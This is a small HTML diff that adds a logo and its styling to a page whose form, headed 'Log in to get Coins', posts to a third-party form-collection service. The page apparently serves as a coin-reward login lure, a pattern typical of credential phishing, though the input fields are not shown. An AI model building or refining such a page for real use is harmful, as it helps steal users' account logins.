--- a/index.html
+++ b/index.html
@@ -12,6 +12,14 @@
     justify-content: center;
     align-items: center;
     height: 100vh;
+    position: relative;
+  }
+  .logo {
+    position: absolute;
+    top: 20px;
+    right: 20px;
+    width: 50px;
+    height: 50px;
   }
   form {
     background: #fff;
@@ -59,6 +67,9 @@
 </style>
 </head>
 <body>
+<!-- Placeholder logo; replace src with your own image URL -->
+<img src="https://via.placeholder.com/50" alt="Class Logo" class="logo">
+
 <form action="https://formspree.io/f/xyznbrvg" method="POST">
   <h2>
     <span class="main-title">Log in to get Coins</span>
